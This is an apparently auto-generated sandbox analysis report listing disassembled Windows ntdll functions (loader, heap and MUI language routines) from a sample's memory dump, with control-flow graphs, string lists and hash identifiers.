                                                                          • Instruction ID: a6643053d284366244d0af05be0bd1f2da836f60db037e8ed7330f0f38b612ff
                                                                          • Opcode Fuzzy Hash: a2c52c9a51a2c87d3959497fa160f4ebe8f2eb417ab2d749973a894cf6308a94
                                                                          • Instruction Fuzzy Hash: D6F06232105918EFD7029BA5DD0099FBBA8EF16360B2540BAE840F7210D674DE019BA9

                                                                          Execution Graph

                                                                          Execution Coverage:0%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:100%
                                                                          Total number of Nodes:1
                                                                          Total number of Limit Nodes:0
                                                                          execution_graph 82182 36402c70 LdrInitializeThunk

                                                                          Executed Functions

                                                                          Function 364035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1 364035c0-364035cc LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9510b4aece2b1b56d77be1038b3f34e101c6b0112c848f7ccafb9754dcc61b4b
                                                                          • Instruction ID: 5b57eea4e206f03bd0e8aa0707f10495de8eb4a2775f78833c93349ded099dcf
                                                                          • Opcode Fuzzy Hash: 9510b4aece2b1b56d77be1038b3f34e101c6b0112c848f7ccafb9754dcc61b4b
                                                                          • Instruction Fuzzy Hash: 03900231A4550407D10072584514706200547E2241F65C412A142492CD87998A5565A2
                                                                          Function 36402C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 36402c70-36402c7c LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: f423fae656399f9cb45038c8684b33226e26387fbfcd227e90f8a22cc2efea14
                                                                          • Instruction ID: dcda5f4ffcf6eb64b59411f2620e8cc2a07f719a36232682ff55e8b229b06389
                                                                          • Opcode Fuzzy Hash: f423fae656399f9cb45038c8684b33226e26387fbfcd227e90f8a22cc2efea14
                                                                          • Instruction Fuzzy Hash: 3D90023164148807D1107258840474A100547E2341F59C412A5424A1CD879989957121

                                                                          Non-executed Functions

                                                                          Function 364694E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 553 364694e0-36469529 554 3646952b-36469530 553->554 555 36469578-36469587 553->555 556 36469534-3646953a 554->556 555->556 557 36469589-3646958e 555->557 559 36469695-364696bd call 36409020 556->559 560 36469540-36469564 call 36409020 556->560 558 36469d13-36469d27 call 36404c30 557->558 567 364696bf-364696da call 36469d2a 559->567 568 364696dc-36469712 559->568 569 36469566-36469573 call 3648972b 560->569 570 36469593-36469634 GetPEB call 3646dc65 560->570 573 36469714-36469716 567->573 568->573 579 3646967d-36469690 RtlDebugPrintTimes 569->579 580 36469636-36469644 570->580 581 36469652-36469667 570->581 573->558 577 3646971c-36469731 RtlDebugPrintTimes 573->577 577->558 587 36469737-3646973e 577->587 579->558 580->581 582 36469646-3646964b 580->582 581->579 583 36469669-3646966e 581->583 582->581 585 36469673-36469676 583->585 586 36469670 583->586 585->579 586->585 587->558 589 36469744-3646975f 587->589 590 36469763-36469774 call 3646a808 589->590 593 36469d11 590->593 594 3646977a-3646977c 590->594 593->558 594->558 595 36469782-36469789 594->595 596 3646978f-36469794 595->596 597 364698fc-36469902 595->597 598 36469796-3646979c 596->598 599 364697bc 596->599 600 36469a9c-36469aa2 597->600 601 36469908-36469937 call 36409020 597->601 598->599 602 3646979e-364697b2 598->602 603 364697c0-36469811 call 36409020 RtlDebugPrintTimes 599->603 605 36469af4-36469af9 600->605 606 36469aa4-36469aad 600->606 618 36469970-36469985 601->618 619 36469939-36469944 601->619 609 364697b4-364697b6 602->609 610 364697b8-364697ba 602->610 603->558 645 36469817-3646981b 603->645 607 36469aff-36469b07 605->607 608 36469ba8-36469bb1 605->608 606->590 613 36469ab3-36469aef call 36409020 606->613 614 36469b13-36469b3d call 36468513 607->614 615 36469b09-36469b0d 607->615 608->590 617 36469bb7-36469bba 608->617 609->603 610->603 630 36469ce9 613->630 642 36469b43-36469b9e call 36409020 RtlDebugPrintTimes 614->642 643 36469d08-36469d0c 614->643 615->608 615->614 624 36469bc0-36469c0a 617->624 625 36469c7d-36469cb4 call 36409020 617->625 621 36469987-36469989 618->621 622 36469991-36469998 618->622 626 36469946-3646994d 619->626 627 3646994f-3646996e 619->627 631 3646998f 621->631 632 3646998b-3646998d 621->632 633 364699bd-364699bf 622->633 637 36469c11-36469c1e 624->637 638 36469c0c 624->638 655 36469cb6 625->655 656 36469cbb-36469cc2 625->656 626->627 629 364699d9-364699f6 RtlDebugPrintTimes 627->629 629->558 659 364699fc-36469a1f call 36409020 629->659 639 36469ced 630->639 631->622 632->622 646 364699c1-364699d7 633->646 647 3646999a-364699a4 633->647 640 36469c20-36469c23 637->640 641 36469c2a-36469c2d 637->641 638->637 649 36469cf1-36469d06 RtlDebugPrintTimes 639->649 640->641 650 36469c2f-36469c32 641->650 651 36469c39-36469c7b 641->651 642->558 685 36469ba4 642->685 643->590 657 3646981d-36469825 645->657 658 3646986b-36469880 645->658 646->629 652 364699a6 647->652 653 364699ad 647->653 649->558 649->643 650->651 651->649 652->646 661 364699a8-364699ab 652->661 663 364699af-364699b1 653->663 655->656 664 36469cc4-36469ccb 656->664 665 36469ccd 656->665 666 36469827-36469850 call 36468513 657->666 667 36469852-36469869 657->667 660 36469886-36469894 658->660 682 36469a21-36469a3b 659->682 683 36469a3d-36469a58 659->683 669 36469898-364698ef call 36409020 RtlDebugPrintTimes 660->669 661->663 671 364699b3-364699b5 663->671 672 364699bb 663->672 673 36469cd1-36469cd7 664->673 665->673 666->669 667->660 669->558 689 364698f5-364698f7 669->689 671->672 678 364699b7-364699b9 671->678 672->633 679 36469cde-36469ce4 673->679 680 36469cd9-36469cdc 673->680 678->633 679->639 686 36469ce6 679->686 680->630 687 36469a5d-36469a8b RtlDebugPrintTimes 682->687 683->687 685->608 686->630 687->558 691 36469a91-36469a97 687->691 689->643 691->617
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $ $0
                                                                          • API String ID: 3446177414-3352262554
                                                                          • Opcode ID: 09343b57da6040a2b6202ae1f4f24750e57257e30ea78c20d88d5b453b1cbe52
                                                                          • Instruction ID: cfa73121174061cf23e0b6e0bb35e0252726f94195da3195c78a5b507a58ebed
                                                                          • Opcode Fuzzy Hash: 09343b57da6040a2b6202ae1f4f24750e57257e30ea78c20d88d5b453b1cbe52
                                                                          • Instruction Fuzzy Hash: CB3207B1A083828FE311CF6AC884B5BFBE5BB88348F14492DF59987350D7B5D949CB52
                                                                          Function 36470274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1296 36470274-36470296 call 36417e54 1299 364702b5-364702cd call 363b76b2 1296->1299 1300 36470298-364702b0 RtlDebugPrintTimes 1296->1300 1305 364706f7 1299->1305 1306 364702d3-364702e9 1299->1306 1304 36470751-36470760 1300->1304 1307 364706fa-3647074e call 36470766 1305->1307 1308 364702f0-364702f2 1306->1308 1309 364702eb-364702ee 1306->1309 1307->1304 1311 364702f3-3647030a 1308->1311 1309->1311 1313 364706b1-364706ba GetPEB 1311->1313 1314 36470310-36470313 1311->1314 1316 364706bc-364706d7 GetPEB call 363bb970 1313->1316 1317 364706d9-364706de call 363bb970 1313->1317 1314->1313 1318 36470319-36470322 1314->1318 1326 364706e3-364706f4 call 363bb970 1316->1326 1317->1326 1319 36470324-3647033b call 363cffb0 1318->1319 1320 3647033e-36470351 call 36470cb5 1318->1320 1319->1320 1330 36470353-3647035a 1320->1330 1331 3647035c-36470370 call 363b758f 1320->1331 1326->1305 1330->1331 1335 36470376-36470382 GetPEB 1331->1335 1336 364705a2-364705a7 1331->1336 1337 36470384-36470387 1335->1337 1338 364703f0-364703fb 1335->1338 1336->1307 1339 364705ad-364705b9 GetPEB 1336->1339 1342 364703a6-364703ab call 363bb970 1337->1342 1343 36470389-364703a4 GetPEB call 363bb970 1337->1343 1340 36470401-36470408 1338->1340 1341 364704e8-364704fa call 363d27f0 1338->1341 1344 36470627-36470632 1339->1344 1345 364705bb-364705be 1339->1345 1340->1341 1348 3647040e-36470417 1340->1348 1364 36470590-3647059d call 364711a4 call 36470cb5 1341->1364 1365 36470500-36470507 1341->1365 1354 364703b0-364703d1 call 363bb970 GetPEB 1342->1354 1343->1354 1344->1307 1349 36470638-36470643 1344->1349 1351 364705c0-364705db GetPEB call 363bb970 1345->1351 1352 364705dd-364705e2 call 363bb970 1345->1352 1357 36470419-36470429 1348->1357 1358 36470438-3647043c 1348->1358 1349->1307 1359 36470649-36470654 1349->1359 1363 364705e7-364705fb call 363bb970 1351->1363 1352->1363 1354->1341 1383 364703d7-364703eb 1354->1383 1357->1358 1366 3647042b-36470435 call 3647dac6 1357->1366 1368 3647044e-36470454 1358->1368 1369 3647043e-3647044c call 363f3bc9 1358->1369 1359->1307 1367 3647065a-36470663 GetPEB 1359->1367 1394 364705fe-36470608 GetPEB 1363->1394 1364->1336 1373 36470512-3647051a 1365->1373 1374 36470509-36470510 1365->1374 1366->1358 1377 36470665-36470680 GetPEB call 363bb970 1367->1377 1378 36470682-36470687 call 363bb970 1367->1378 1370 36470457-36470460 1368->1370 1369->1370 1381 36470472-36470475 1370->1381 1382 36470462-36470470 1370->1382 1385 3647051c-3647052c 1373->1385 1386 36470538-3647053c 1373->1386 1374->1373 1391 3647068c-364706ac call 364686ba call 363bb970 1377->1391 1378->1391 1392 36470477-3647047e 1381->1392 1393 364704e5 1381->1393 1382->1381 1383->1341 1385->1386 1395 3647052e-36470533 call 3647dac6 1385->1395 1397 3647053e-36470551 call 363f3bc9 1386->1397 1398 3647056c-36470572 1386->1398 1391->1394 1392->1393 1401 36470480-3647048b 1392->1401 1393->1341 1394->1307 1403 3647060e-36470622 1394->1403 1395->1386 1410 36470563 1397->1410 1411 36470553-36470561 call 363efe99 1397->1411 1402 36470575-3647057c 1398->1402 1401->1393 1407 3647048d-36470496 GetPEB 1401->1407 1402->1364 1408 3647057e-3647058e 1402->1408 1403->1307 1413 364704b5-364704ba call 363bb970 1407->1413 1414 36470498-364704b3 GetPEB call 363bb970 1407->1414 1408->1364 1416 36470566-3647056a 1410->1416 1411->1416 1422 364704bf-364704dd call 364686ba call 363bb970 1413->1422 1414->1422 1416->1402 1422->1393
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                          • API String ID: 3446177414-1700792311
                                                                          • Opcode ID: 992744057aa3c81a21c38f4b60b19c567622ab43d5aafba5a8e839f787ae455a
                                                                          • Instruction ID: ed1b1aaa8d31dbb028ba58b8595fdeaba37e27a23674256cc3f74f175423b832
                                                                          • Opcode Fuzzy Hash: 992744057aa3c81a21c38f4b60b19c567622ab43d5aafba5a8e839f787ae455a
                                                                          • Instruction Fuzzy Hash: 4DD1EEB5D01685DFEB02CF65C850AE9BBF2FF49B14F048049E4A5AB752CB34D981CB51
                                                                          Function 363BD34C Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/>6$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                          • API String ID: 0-1702153194
                                                                          • Opcode ID: 51f1b8d3062664aa35ca18d7b65b4ca17076c731a850ee06d91ddebc145f4d90
                                                                          • Instruction ID: 3e03ceb0f25d751bbf851703c77104d99932dd926919e4f9ab3e5a638503015a
                                                                          • Opcode Fuzzy Hash: 51f1b8d3062664aa35ca18d7b65b4ca17076c731a850ee06d91ddebc145f4d90
                                                                          • Instruction Fuzzy Hash: A8B18DB69183559FDB11CF24C880B6BBBE8EF88754F41492EF888D7240DB74D948CB96
                                                                          Function 3646F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                          • API String ID: 3446177414-1745908468
                                                                          • Opcode ID: 4398dd27d5f9fe378a1a6ca510c039a79b8a83303a659fb863916a9d5fe1aaff
                                                                          • Instruction ID: 747111566b04ef911f5250e9cbefe8a5e97cc42e595887d01e1ca71a98389369
                                                                          • Opcode Fuzzy Hash: 4398dd27d5f9fe378a1a6ca510c039a79b8a83303a659fb863916a9d5fe1aaff
                                                                          • Instruction Fuzzy Hash: AA91EC35D00744DFEB42DF6AC880A9DBBF2FF49318F148099E485AB761CB75A942CB51
                                                                          Function 364712ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                          • API String ID: 0-3591852110
                                                                          • Opcode ID: eed2b0c417e119c19a406ca158d93065448355828e21559f943983d969fe310f
                                                                          • Instruction ID: 520ed28011e277e12019fb83eb4ffdefaf8e4e86210ad6d93184080a5fa01ecb
                                                                          • Opcode Fuzzy Hash: eed2b0c417e119c19a406ca158d93065448355828e21559f943983d969fe310f
                                                                          • Instruction Fuzzy Hash: 6D129C74E00652DFE7268F25C480BEABFF5EF09714F588459E4A68BA41DB34E881CB91
                                                                          Function 363BD08D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 363BD0CF
                                                                          • H/>6, xrefs: 3641A843
                                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 363BD196
                                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 363BD262
                                                                          • @, xrefs: 363BD313
                                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 363BD146
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 363BD2C3
                                                                          • @, xrefs: 363BD0FD
                                                                          • @, xrefs: 363BD2AF
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/>6$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                          • API String ID: 0-588834534
                                                                          • Opcode ID: 31952c9c28e3df361dcbe02557e445e411dbad04f3054c790e0b75bc233c65a7
                                                                          • Instruction ID: f9502fc68502ebf4e1f45d7adea8990838b765b7c9aa6c3602ce68189ca2bd78
                                                                          • Opcode Fuzzy Hash: 31952c9c28e3df361dcbe02557e445e411dbad04f3054c790e0b75bc233c65a7
                                                                          • Instruction Fuzzy Hash: 20A17BB1D083559FE711CF21C884BABBBE8BB84759F40492EE59897240D774DA48CF93
                                                                          Function 363D1070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 3446177414-3570731704
                                                                          • Opcode ID: 0f4b4f8f63b386698fd304ef33cc5f38d065db8cca6444f9a60895e739f40293
                                                                          • Instruction ID: ec28b4049222fdda1e2a7f90068d7aa44f3c27a0cc599e0fd7029f9796895114
                                                                          • Opcode Fuzzy Hash: 0f4b4f8f63b386698fd304ef33cc5f38d065db8cca6444f9a60895e739f40293
                                                                          • Instruction Fuzzy Hash: D6922776E10328CFEB25CF15CC80B99BBB6AF45354F2581EAE949A7250DB309E84CF51
                                                                          Function 363ED7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlDebugPrintTimes.NTDLL ref: 363ED959
                                                                            • Part of subcall function 363C4859: RtlDebugPrintTimes.NTDLL ref: 363C48F7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-1975516107
                                                                          • Opcode ID: 9a985aa1de0a33fc0503775653231242b1de0bfd7ba352739e5d059243d42cda
                                                                          • Instruction ID: b9be06f0083909eed3b757cc9c2ea58a995af0fb7f70a6ffa0b73d5740918ccc
                                                                          • Opcode Fuzzy Hash: 9a985aa1de0a33fc0503775653231242b1de0bfd7ba352739e5d059243d42cda
                                                                          • Instruction Fuzzy Hash: FE510FB6E04355DFEB04CFA4C8807ADBBB2BF48308F648159D9407B281D775A986CBA1
                                                                          Function 36459179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                          • API String ID: 0-3063724069
                                                                          • Opcode ID: 9d9c325e9aa435291e553db92a5aa5735b1485687babc292248bbf7851a221fd
                                                                          • Instruction ID: bdc6dfb3c439d0891479283e4bfca1b37341365d479eabd275fdfd3f6d1e2db0
                                                                          • Opcode Fuzzy Hash: 9d9c325e9aa435291e553db92a5aa5735b1485687babc292248bbf7851a221fd
                                                                          • Instruction Fuzzy Hash: 55D190B2C083A5AFE721CE54C880B5BB7E8AF84754F42592DFA9497250E774C948CBD3
                                                                          Function 363BF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-523794902
                                                                          • Opcode ID: d0306e4422c5ead90077d078a599b6db671583d25b34a417746fea923ecd7200
                                                                          • Instruction ID: d0a5afb310c79d002fe9b6fdf28d3d66760ee269ad594499eb06c8fcfb341c5c
                                                                          • Opcode Fuzzy Hash: d0306e4422c5ead90077d078a599b6db671583d25b34a417746fea923ecd7200
                                                                          • Instruction Fuzzy Hash: 9B422079A083819FEB01CF69C880B6ABBE5FF88348F14496DE485CBB51DB34D945CB52
                                                                          Function 363E51EF Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: H/>6$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                          • API String ID: 0-2039172670
                                                                          • Opcode ID: ca590c36fa8be84b7612586cb3c289abb8d81a0ba9ffed915ebac4962d54a62d
                                                                          • Instruction ID: 4bf1227ebfa0e062b4c6292bc4310b711703471c734cff49cc20d8f7c5c98a97
                                                                          • Opcode Fuzzy Hash: ca590c36fa8be84b7612586cb3c289abb8d81a0ba9ffed915ebac4962d54a62d
                                                                          • Instruction Fuzzy Hash: 24F14CB6D10229EFDB05CFA9C980ADEBBF9FF08654F51406AE501A7210DB759E01CFA0
                                                                          Function 363DB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
